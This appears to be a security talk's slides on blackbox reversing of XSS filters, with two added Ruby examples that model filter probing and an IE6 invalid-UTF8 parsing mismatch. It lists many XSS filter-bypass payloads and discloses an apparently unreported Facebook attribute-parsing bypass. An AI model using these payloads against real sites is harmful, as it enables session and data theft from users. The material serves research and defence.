Blackbox Reversing of XSS Filters

Alexander Sotirov

Web applications are the future

Reversing web apps
  blackbox reversing
  very different environment and tools

Cross-site scripting (XSS)
  the "strcpy" of web app development
  reversing and bypassing XSS filters


  User generated content and Web 2.0
  Implementing XSS filters
  Reversing XSS filters
  XSS in Facebook

Part I
User generated content and Web 2.0
Web 2.0
  User generated content
  Aggregation of untrusted content
  Significantly increased attack surface

User generated content
  Lightweight markup (BBcode, Wikipedia)
  Limited HTML
  Full HTML and JavaScript
  Images, sound, video

Attacker generated content
  Social networking
    Samy's MySpace worm
    multiple Orkut worms, stealing bank info
  Hotmail and Yahoo Mail cross-site scripting
    worm written by SkyLined in 2002
  many SquirrelMail cross-site scripting bugs
  hacking WordPress with XSS

Cross site scripting (XSS)

  <p>Hello <script>alert('XSS')</script></p>

Web security model
  Same origin policy
    Prevents scripts from one domain from manipulating documents loaded from other domains
  Cross site scripting allows us to execute arbitrary scripts on a page loaded from another domain

What can XSS do?
  Stealing data from web pages
  Capturing keystrokes on a web page
  Stealing authentication cookies
  Arbitrary HTTP requests with

Part II
Implementing XSS filters

XSS filters
  Goal: remove all scripts from untrusted HTML
  Why this is hard:
    Many HTML features that allow scripting
    Proprietary extensions to HTML
    Parsing of invalid HTML
    Browser bugs
Features that allow scripting
  Script tags
    <script src="js">
  Event handler attributes
    <body onload="alert('XSS')">
  javascript: URLs in style and src attributes
    <p style="background:url('javascript:alert(1)')">
    <img src="javascript:alert('XSS')">

Proprietary extensions to HTML
  XML data islands (IE)
    <xml src="" id="x">
    <span datasrc="#x" datafld="c" dataformatas="html">
  JavaScript expressions in attributes (NS4)
    <p id="&{alert('XSS')};">
  Conditional comments (IE)
    <!--[if gte IE 5]>
Parsing invalid HTML
  extra '<' before opening tag
  NULL byte inside tag name
  '/' separator between tag and attribute
  no quotes around attribute value
  missing '>' in closing tag
  Browser behavior is not documented or standardized. IE7 parses a script tag mangled in all of these ways as:
    <script src="js"></script>

Browser bugs
  Invalid UTF8 handling in Internet Explorer 6
    <body foo="\xC0" bar=" onload=alert(1)//">
  Firefox and IE7 read two attributes, foo and bar:
    <body foo="?" bar=" onload=alert(1)//">
  IE6 treats the invalid lead byte \xC0 and the quote after it as a single character, so the value of foo runs on to the next quote and onload becomes an attribute of its own:
    <body foo="? bar=" onload=alert(1)//">
  Attribute parsing in Firefox < 2.0.0.2
    <body onload-(89*():;<.=.>:7??//@43AB=alert("XSS")>
  The payload relies on Firefox < 2.0.0.2 treating an attribute name followed by such characters as the plain name onload; a filter that parses the name strictly does not see an event handler.
Implementing XSS filters
  String matching filters
  HTML DOM parsers

String matching filters
  Remove all script tags
  Problems:
    Invalid HTML accepted by browsers
    Encoding of attribute values and URLs
    Using the filter against itself (the removal splices a new tag together)
    Incomplete blacklists

HTML DOM parsers
  Example input: <body onload="alert(1)">
  1. Build a DOM tree from the input stream
    handle invalid UTF8 sequences
  2. Apply XSS filters to the DOM tree
  3. Output the DOM tree in a canonical form
    escape special characters
    add closing tags where necessary

  Blacklisting
    remove known bad tags and attributes
    must be 100% complete to be safe
  Whitelisting
    allow only known safe tags and attributes
    safer than blacklisting
Part III
Reversing XSS filters

Reversing XSS filters
  Remote web applications
    no access to source code or binaries
    limited by bandwidth and request latency
    draws attention
  Blackbox reversing
    send input and inspect the output
    build a filter model based on its behavior

Iterative model generation
  1. Build an initial model of the filter
  2. Generate a test case
  3. Send test case and inspect the result
  4. Update the model
  5. Go to step 2

Example of parser reversing
  Test case (Ruby): one probe per byte value, to learn which bytes the filter accepts between the tag name and an attribute
    data = ''
    (0..0xFF).each { |x|
      data << "<p #{x.chr}a=''></p>"
    }
  whitespace regexp
    /[\x0C\t\r\n "'\/]/
  attribute name regexp

Framework for XSS filter reversing
  run a set of tests against a web application
  store the results
  manual analysis of the output
  result diffing

  Application modules
    abstract application specific details
    sending data, result parsing, error detection
  Test modules
    test generation functions
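The iterative loop, the per-byte test case and the framework pieces (application module, test module, stored results, diffing) as one added Ruby example; this is not the author's framework. The remote application is replaced by a constructed stand-in filter, `standin_filter`, whose private separator set and attribute-name character class the probe has to recover; an application module that does the HTTP round-trip would have the same `call(input) -> output` shape. `STANDIN_SEPARATORS`, `separator_tests`, `attr_name_tests`, `run_tests`, `diff_results`, `accepted_bytes`, `byte_class_regexp` and `reverse_separators` are all names chosen for the example.

```ruby
# Added example, not the author's framework: the blackbox loop above run
# offline. The "application module" is a callable; here it wraps a constructed
# stand-in filter instead of an HTTP round-trip to a remote site.

# Constructed stand-in for the remote filter. It accepts "<p<sep>name=''></p>",
# where <sep> is one or more bytes from its private separator set and name
# matches [a-z0-9-]+, canonicalizes that to <p name=""></p> and drops anything
# else. The separator set is what the probe below has to recover.
STANDIN_SEPARATORS = [0x09, 0x0A, 0x0C, 0x0D, 0x20, 0x2F].freeze  # \t \n \f \r space /

def standin_filter(input)
  s = input.b
  return '' unless s.start_with?('<p') && s.end_with?("=''></p>")
  body = s[2...-8]                                     # between "<p" and "=''></p>"
  i = 0
  i += 1 while i < body.bytesize && STANDIN_SEPARATORS.include?(body.getbyte(i))
  return '' if i.zero?                                 # tag name must end somewhere
  name = body.byteslice(i..-1)
  return '' unless name =~ /\A[a-z0-9-]+\z/n
  "<p #{name}=\"\"></p>"
end

# Test module: generator functions, one (label, input) pair per byte value.
def separator_tests                                   # the slide's test case
  (0..0xFF).map { |x| [x, "<p".b + x.chr + "a=''></p>".b] }
end

def attr_name_tests                                   # next round: bytes inside a name
  (0..0xFF).map { |x| [x, "<p a".b + x.chr + "b=''></p>".b] }
end

# Framework core: send every test through the application module, store results.
def run_tests(app, tests)
  tests.each_with_object({}) { |(label, input), h| h[label] = app.call(input) }
end

# Result diffing: labels whose output changed between two stored runs.
def diff_results(old, new)
  (old.keys | new.keys).select { |k| old[k] != new[k] }
end

# Model update: a byte is accepted if the canonical <p ...> came back.
def accepted_bytes(results)
  results.select { |_, out| out.start_with?('<p ') }.keys.sort
end

def byte_class_regexp(bytes)
  Regexp.new('[' + bytes.map { |b| format('\x%02X', b) }.join + ']', Regexp::NOENCODING)
end

# Iterative model generation: each round's test set is chosen from what the
# previous round established (the name probe relies on 0x20 being a separator).
def reverse_separators(app)
  model = {}
  model[:separators] = accepted_bytes(run_tests(app, separator_tests))
  raise 'no separator found, cannot probe names' unless model[:separators].include?(0x20)
  model[:name_bytes] = accepted_bytes(run_tests(app, attr_name_tests))
  model[:separator_regexp] = byte_class_regexp(model[:separators])
  model
end

if __FILE__ == $0
  m = reverse_separators(method(:standin_filter))
  puts "whitespace regexp: #{m[:separator_regexp].inspect}"
  puts "attribute name bytes: #{m[:name_bytes].map(&:chr).join.inspect}"
end
```

Against a real site the only change is the application module: it must detect errors (rate limiting, a login redirect, the page rejecting the whole post) and report them separately from "filter dropped the tag", otherwise a blocked request is silently recorded as a rejected byte and the model drifts. Keeping every run's raw results makes `diff_results` useful later, when the site changes its filter and you want to know which bytes moved.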

Using the model
  Grammar based analysis
    build a grammar for the filter output
    build a grammar for the browser parser
    find a valid sentence in both grammars that includes a <script> tag
  Reimplement the filter and fuzz it locally

Part IV
XSS in Facebook

Facebook platform
  Third party applications
    application pages
    content in user profiles
    message and wall post attachments
  FBML
    HTML with a few restrictions
    limited style sheet and scripting support
    sandboxed JavaScript

FBML processing
  [Diagram: the browser sends a GET request for the funapp page to Facebook; Facebook sends its own GET request to the funapp application server, receives FBML from it and returns HTML to the browser.]
  Facebook serves as a proxy for application content
  FBML processing:
    special FBML tags are replaced with HTML
    non-supported HTML tags are removed
    scripts are sandboxed

Reversing the FBML parser
  write test case in
  HTML DOM parser
    Accepts and fixes invalid input
    Canonicalized output
    Whitelist of tags, blacklist of attributes

Facebook XSS
  Invalid UTF8 sequences
    input is parsed as ASCII
    HTTP response headers specify UTF8 encoding
    affects only IE6
      <img src="J" foo="\xC0" bar="onload=alert(1)//">
    Reported and fixed in February.
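The IE6 UTF8 bug from Part II and the Facebook instance above, modeled in an added Ruby example (not Facebook's or the author's code). The same bytes are scanned twice: as ASCII, the way a filter that "parses the input as ASCII" reads them, and with the IE6 behaviour the slides describe, where a multi-byte lead byte such as \xC0 swallows the byte after it even when that byte is the closing quote. `char_len`, `parse_attrs`, `event_handlers`, `safe_to_parse?` and `PAYLOAD` are constructed for the example; the IE6 rule is an assumption taken from the slide's two renderings of the body tag, not measured against the browser.

```ruby
# Added example, not Facebook's or the author's code. Two readings of the same
# bytes: :ascii (what the filter does) and :ie6_utf8 (the IE6 behaviour the
# slides describe, assumed here, not measured): a lead byte such as \xC0
# swallows the byte after it, even when that byte is the closing quote.

PAYLOAD = %(<img src="x" foo="\xC0" bar="onload=alert(1)//">).b  # after the slide

# Bytes one character occupies starting at byte `b` under each model.
def char_len(b, mode)
  return 1 if mode == :ascii || b < 0xC0
  return 2 if b <= 0xDF
  return 3 if b <= 0xEF
  b <= 0xF7 ? 4 : 1
end

WS = [0x09, 0x0A, 0x0C, 0x0D, 0x20].freeze

# Minimal attribute scanner over the inside of a start tag: [[name, value], ...]
def parse_attrs(tag_body, mode)
  s, i, attrs = tag_body.b, 0, []
  loop do
    i += 1 while i < s.bytesize && WS.include?(s.getbyte(i))
    break if i >= s.bytesize
    start = i
    i += 1 while i < s.bytesize && !WS.include?(s.getbyte(i)) && s.getbyte(i) != 0x3D
    name = s.byteslice(start...i).downcase
    i += 1 while i < s.bytesize && WS.include?(s.getbyte(i))
    value = ''.b
    if i < s.bytesize && s.getbyte(i) == 0x3D                  # '='
      i += 1
      i += 1 while i < s.bytesize && WS.include?(s.getbyte(i))
      q = s.getbyte(i)
      if q == 0x22 || q == 0x27                               # quoted value
        i += 1
        until i >= s.bytesize || s.getbyte(i) == q
          n = char_len(s.getbyte(i), mode)                    # the two models differ here
          value << s.byteslice(i, n)
          i += n
        end
        i += 1                                                # closing quote
      else                                                    # unquoted value
        start = i
        i += 1 while i < s.bytesize && !WS.include?(s.getbyte(i))
        value = s.byteslice(start...i)
      end
    end
    attrs << [name, value]
  end
  attrs
end

# Attribute names starting with "on" that a given reader sees in the tag.
def event_handlers(tag, mode)
  body = tag.b[/\A<[a-zA-Z]+(.*)>\z/mn, 1] or return []
  parse_attrs(body, mode).map(&:first).select { |n| n.start_with?('on') }
end

# The fix the slides call "handle invalid UTF8 sequences": refuse to parse bytes
# that are not valid UTF-8, so filter and browser can never read them apart.
def safe_to_parse?(bytes)
  bytes.dup.force_encoding(Encoding::UTF_8).valid_encoding?
end

if __FILE__ == $0
  body = PAYLOAD[/\A<img(.*)>\z/mn, 1]
  [:ascii, :ie6_utf8].each { |mode| puts "#{mode}: #{parse_attrs(body, mode).inspect}" }
  puts "event handlers seen by filter: #{event_handlers(PAYLOAD, :ascii).inspect}"
  puts "event handlers seen by IE6:    #{event_handlers(PAYLOAD, :ie6_utf8).inspect}"
  puts "valid UTF-8? #{safe_to_parse?(PAYLOAD)}"
end
```

Under the ASCII reading the tag has three harmless attributes, src, foo and bar, and bar's value is just text, so an attribute blacklist has nothing to object to. Under the IE6 reading foo's value swallows the quote and runs on to `bar="`, after which `onload=alert(1)//"` is a bare attribute; the trailing `//` turns the leftover quote into a JavaScript comment. `safe_to_parse?` is the cheap defence: a filter that rejects or re-encodes invalid byte sequences before building its tree never has to agree with a browser about them.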
This is where I drop the 0day.

  Attribute name parsing
    mismatch between Facebook and Firefox parsers
    affects only Firefox < 2.0.0.2
      <img src="J" onload:="alert(1)">
    Not reported, Facebook is still vulnerable.

Facebook Demo
Part V

Web 2.0 sites are totally screwed
  broken web security model
  undocumented browser behavior
  no programming language support

Blackbox reversing
  the only way to reverse most web apps
  we need better tools and automation